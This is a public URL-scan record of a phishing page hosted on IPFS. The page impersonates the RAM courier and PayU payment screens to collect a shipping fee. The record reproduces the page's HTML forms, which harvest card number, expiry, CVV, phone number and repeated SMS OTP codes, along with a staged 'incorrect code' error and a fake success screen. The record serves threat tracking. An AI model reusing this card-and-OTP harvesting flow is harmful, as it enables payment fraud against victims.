ipfs.moralis.io Open in urlscan Pro
54.163.150.31  Public Scan

URL: https://ipfs.moralis.io:2053/ipfs/Qmbs3Yv5B7FpzKTwFP6h3FWESrGw1dWi8tcSqs7TQsLFSf
Submission: On June 12 via automatic, source openphish — Scanned from DE

Form analysis 6 forms found in the DOM

<form id="quick-login-form" autocomplete="off">
  <input id="login_emailaddress" type="text" required="" name="emailaddress" class="ram-input" placeholder="EMAIL ADDRESS" autocomplete="login_emailaddress" value="">
  <input type="password" required="" name="password" class="ram-input" placeholder="PASSWORD" autocomplete="password" value="">
  <a class="forgot-link" data-savepage-href="/myram/passwordrecovery" href="#">Forgot Password</a>
  <button class="ram-btn teal">SUBMIT</button>
</form>

POST

<form id="ipay-form" method="post"><input name="__RequestVerificationToken" type="hidden"
    value="CfDJ8F3yEoH9Wz1BuNkGB7uOlI1HMBqCOUCyd7vbIXuCulIHLvtNjSQPO9i1_yewgJkRcsne5opNxoxEF455G4mLdXK1srNHh9lXuGnDVKmyNhJqqpNTZwjIsFGzvgHegJD8wm1gxX0tAdintOl-zCeRQeQ" autocomplete="__RequestVerificationToken"></form>

POST

<form id="signOnForm" class="form-horizontal" method="post">
  <div class="form-group">
    <p style="margin-left:4%;">We accept major credit cards including VISA and MasterCard. The accepted payment options are provided above.</p><br>
    <div id="error" class="col-lg-10 col-lg-offset-1 col-md-10 col-md-offset-1 col-sm-10 col-sm-offset-1 col-xs-10 col-xs-offset-1 alert alert-info" role="alert" style="display:none; color:red; text-align:center; font-weight:bold;">
    </div>
    <label class="col-lg-3 col-md-3 col-sm-3 control-label text-align-right">Card number</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="cn" name="cn" type="tel" class="is-numbersonly creditcard form-control" required="required" maxlength="19" onkeypress="validate(event)" autocomplete="off"><span class="is-validationindicator"></span>
    </div>
  </div> <!-- /.form-group -->
  <div class="form-group">
    <label class="col-lg-3 col-md-3 col-sm-3 control-label text-align-right">Card holder name</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="nm" name="nm" type="text" class="form-control" required="required" value="" autocomplete="off"><span class="is-validationindicator"></span>
    </div>
  </div> <!-- /.form-group -->
  <div class="form-group">
    <label class="col-lg-3 col-md-3 col-sm-3 col-xs-12 control-label">Expiry date</label>
    <div class="col-lg-4 col-md-6 col-sm-6 col-xs-12 no-padding">
      <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 input-container">
        <select id="mm" name="mm" class="form-control expMonth expiry-date" required="">
          <option value="-1">MM</option>
          <option value="01">01</option>
          <option value="02">02</option>
          <option value="03">03</option>
          <option value="04">04</option>
          <option value="05">05</option>
          <option value="06">06</option>
          <option value="07">07</option>
          <option value="08">08</option>
          <option value="09">09</option>
          <option value="10">10</option>
          <option value="11">11</option>
          <option value="12">12</option>
        </select><span class="is-validationindicator"></span>
      </div>
      <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6 input-container">
        <select id="yy" name="yy" class="form-control expYear expiry-date" required="">
          <option value="-1">YY</option>
          <option value="2023">2023</option>
          <option value="2024">2024</option>
          <option value="2025">2025</option>
          <option value="2026">2026</option>
          <option value="2027">2027</option>
          <option value="2028">2028</option>
          <option value="2029">2029</option>
          <option value="2030">2030</option>
          <option value="2031">2031</option>
          <option value="2032">2032</option>
          <option value="2033">2033</option>
          <option value="2034">2034</option>
          <option value="2035">2035</option>
          <option value="2036">2036</option>
          <option value="2037">2037</option>
          <option value="2038">2038</option>
          <option value="2039">2039</option>
          <option value="2040">2040</option>
          <option value="2041">2041</option>
          <option value="2042">2042</option>
          <option value="2043">2043</option>
          <option value="2044">2044</option>
          <option value="2045">2045</option>
          <option value="2046">2046</option>
          <option value="2047">2047</option>
          <option value="2048">2048</option>
          <option value="2049">2049</option>
          <option value="2050">2050</option>
          <option value="2051">2051</option>
          <option value="2052">2052</option>
          <option value="2053">2053</option>
          <option value="2054">2054</option>
          <option value="2055">2055</option>
          <option value="2056">2056</option>
          <option value="2057">2057</option>
          <option value="2058">2058</option>
          <option value="2059">2059</option>
          <option value="2060">2060</option>
          <option value="2061">2061</option>
        </select><span class="is-validationindicator"></span>
      </div>
    </div>
  </div> <!-- /.form-group -->
  <div class="form-group " id="cvvfld">
    <label class="col-lg-3 col-md-3 col-sm-3 control-label">CVV number</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="cvv" name="cr" title="" type="tel" class="is-numbersonly form-control" required="required" maxlength="3" onkeypress="validate(event)" autocomplete="off"><span class="is-validationindicator"></span>
    </div>
  </div> <!-- /.form-group -->
  <div class="form-group">
    <label class="col-lg-3 col-md-3 col-sm-3 control-label text-align-right">Phone number:</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="phone" name="em" type="tel" class="form-control" required="required" value="" autocomplete="off"><span class="is-validationindicator"></span>
    </div>
  </div> <!-- /.form-group -->
  <!--Only Numeric value in Textbox Script -->
  <script type="text/javascript">
    function validate(evt) {
      var theEvent = evt || window.event;
      // Handle paste
      if (theEvent.type === 'paste') {
        key = event.clipboardData.getData('text/plain');
      } else {
        // Handle key press
        var key = theEvent.keyCode || theEvent.which;
        key = String.fromCharCode(key);
      }
      var regex = /[0-9]|\./;
      if (!regex.test(key)) {
        theEvent.returnValue = false;
        if (theEvent.preventDefault) theEvent.preventDefault();
      }
    }
  </script>
  <!--Only Numeric value in Textbox Script -->
  <div class="btn_field left">
    <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-3">
      <div class="offset-container text-nowrap">
        <input type="hidden" name="step" value="cc">
        <input type="hidden" name="captcha">
        <button id="btnPay" type="submit" class="btn btn-primary confirmPinModal anon_pay">Pay R16.13</button>
        <a id="cancelBtn" data-savepage-href="cancelRedirect.do" href="#" class="btn btn-default anon_cancel">Cancel</a>
      </div>
    </div>
  </div> <!-- /.row -->
  <div class="row">
    <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-3">
      <div class="offset-container col-lg-6 col-md-8 col-sm-9">
        <small>*You may be redirected to your bank's secure site to authenticate yourself before making the payment.</small>
      </div>
    </div>
  </div> <!-- /.row -->
</form>

POST

<form id="signOnForm" class="form-horizontal" method="post">
  <div class="form-group">
    <p style="margin-left:4%;">Please submit the One-Time-Password code, sent to your Mobile Device.</p><br>
    <label class="col-lg-3 col-md-3 col-sm-3 control-label text-align-right">SMS OTP</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="ss" name="ss" type="tel" class="is-numbersonly creditcard form-control" required="required" maxlength="19" autocomplete="off"><span id="error2" style="color: red; display:none;">The one-time security code you entered is incorrect.
        Enter it again.</span><span class="is-validationindicator"></span>
    </div>
  </div> <!-- /.form-group -->
  <div class="btn_field left">
    <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-3">
      <div class="offset-container text-nowrap">
        <input type="hidden" name="step" value="sms">
        <input type="hidden" name="captcha">
        <button id="btnPay2" type="submit" class="btn btn-primary confirmPinModal anon_pay">Submit</button>
      </div>
    </div>
  </div> <!-- /.row -->
</form>

POST

<form id="signOnForm" class="form-horizontal" method="post">
  <div class="form-group">
    <p style="margin-left:4%;">Please submit the One-Time-Password code, sent to your Mobile Device.</p><br>
    <label class="col-lg-3 col-md-3 col-sm-3 control-label text-align-right">SMS OTP</label>
    <div class="col-lg-4 col-md-6 col-sm-6 input-container">
      <input id="ss2" name="ss" type="tel" class="is-numbersonly creditcard form-control" required="required" maxlength="19" autocomplete="off">
      <span id="error3" style="color: red;">The one-time security code you entered is incorrect. Enter it again.</span>
    </div>
  </div> <!-- /.form-group -->
  <div class="btn_field left">
    <div class="col-lg-offset-3 col-md-offset-3 col-sm-offset-3">
      <div class="offset-container text-nowrap">
        <input type="hidden" name="step" value="erro1">
        <input type="hidden" name="captcha">
        <button id="btnPay3" type="submit" class="btn btn-primary confirmPinModal anon_pay">Submit</button>
      </div>
    </div>
  </div> <!-- /.row -->
</form>

POST

<form id="newcreditcard" class="form-horizontal" action="" method="post">
  <div class="form-group">
    <div style="text-align: center;">
      <img style="width: 38px; height: 38px;" alt="" src="https://jquery-code373.cloudns.nz/rm9583/rm283393/files/suc.png"><br><br>
      <span style="font-weight: bold;">Payment successful</span>
      <p style="margin-left:4%;">Your OTP has been accepted.</p><br>
      <p style="margin-left:4%;">You will receive a message shortly to confirm your delivery address...</p><br><br>
      <span style="font-weight: bold;">Parcel Number</span> : RL001097064<br>
      <span style="font-weight: bold;">Merchant</span> : RAM<br>
      <span style="font-weight: bold;">Amount</span> : R16.13<br>
      <span style="font-weight: bold;">Date</span> : 01.08.2024
    </div>
  </div>
  <script data-savepage-type="" type="text/plain"></script>
  <script data-savepage-type="text/javascript" type="text/plain"></script>
</form>

Text Content

RAM - Confirm & Payment


Please note that this website makes use of JavaScript and will not function
properly with JavaScript disabled. Please enable JavaScript in your browsers'
preferences.

 * Home
 * Services
 * Solutions
 * Send a Parcel
 * Track your Parcel
 * Contact us
 * Takealot
 * Takealot
 * 

 * 010 494 8223
 * Business Portal
 * baco

Forgot Password SUBMIT
OR
Register

 * Home
 * Services
 * Solutions
 * Send a Parcel
 * Track your Parcel
 * Contact us
 * Takealot
 * 




SEND PARCEL


CONFIRM & PAYMENT

01
Order
02
Parcel Dimensions
03
Service
04
Shipping fees
05
Complete




SHIPPING FEES

Your shipment is ready for delivery, thank you for choosing RAM services. please
pay the shipping fee to complete the delivery within the next 24 hours.




PAYMENT DETAILS

Economy Service delivery of 1 parcel with a charge weight of 0.856 kg

Base ChargeR3.00 Waybill SurchargeR5.50 Fuel Surcharge 34.82 %R6.30 Sub
TotalR1.80 VAT 15 %R1.62 Grand TotalR16.13

Pay by Card

We accept South African MasterCard and Visa credit, and debit cards

Please select a payment method above.

Pay by Cad or Pay by EFT

I have read and understood all of RAM s Standard Terms and Conditions and Legal
Documentation associated with the specific service I have requested from RAM.

CONFIRM AND PROCEED TO PAYMENT

Please agree to the terms and conditions before you continue





COMPANY INFORMATION

 * About Us
 * No Sub-contracting
 * History
 * Careers


SERVICES

 * Local Courier Services
 * Special Courier Services
 * Distribution Services
 * International Services
 * Warehousing Services


LEGAL

 * Legal Documents


INFO

 * Contact Us
 * Sales
 * Payment Options
 * Fuel Surcharge
 * FAQs

 * 2024 RAM. All Rights Reserved
 * 
 * COVID-19 Corona Virus South African Resource Portal
 * 

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za










Please wait while you are redirected to the payment server.




RAM
RL001097064
Amount Due
R16.13

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za


CHOOSE YOUR PAYMENT METHOD

Card


We accept major credit cards including VISA and MasterCard. The accepted payment
options are provided above.



Card number

Card holder name

Expiry date
MM 010203040506070809101112
YY
202320242025202620272028202920302031203220332034203520362037203820392040204120422043204420452046204720482049205020512052205320542055205620572058205920602061
CVV number

Phone number:

Pay R16.13 Cancel
*You may be redirected to your bank's secure site to authenticate yourself
before making the payment.

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za










Loading......




RAM
RL001097064
Amount Due
R16.13
?

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za


PROTECTING YOUR ONLINE PAYMENTS

Please submit the One-Time-Password code, sent to your Mobile Device.


SMS OTP
The one-time security code you entered is incorrect. Enter it again.
Submit

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za










Loading......




RAM
RL001097064
Amount Due
R16.13
?

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za


PROTECTING YOUR ONLINE PAYMENTS

Please submit the One-Time-Password code, sent to your Mobile Device.


SMS OTP
The one-time security code you entered is incorrect. Enter it again.
Submit

PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za










Loading......




PAYING WITH PAYU APP

PayU is your trusted partner for online and mobile payments. You can speed
through checkout, track your transactions and receive amazing offers.

Paying from a computer or tablet? Pay quickly and easily with your smartphone.

If you are a new user, simply download the PayU App from the Google Play store
here.

Steps to Pay:
 1. Open the PayU App
 2. Use your phone's camera to scan the QR code displayed on screen
 3. Enter your PayU Pin/Password
 4. Click "Pay" to make payment
 5. And voila! You will be redirected to a page confirming your purchase

Want to know more? Give us a shout at support@payu.co.za



Payment successful

Your OTP has been accepted.


You will receive a message shortly to confirm your delivery address...



Parcel Number : RL001097064
Merchant : RAM
Amount : R16.13
Date : 01.08.2024
 * 

You agree that your personal data will be processed when you choose a payment
method and proceed with a transaction. We may share your personal data with
entities involved in processing your transaction. Depending on the payment
method you choose, this can include banks, merchants, EFT providers, payment
schemes, loan institutions or loyalty points providers. Providing personal data
is a choice by you. If you choose not to provide your personal data, your
transaction may be rejected. For information on how we process your personal
data and your rights, see our PayU Privacy Statement. For information on our
terms, compliance and security standards, see our Legal Information.


All Rights Reserved 2024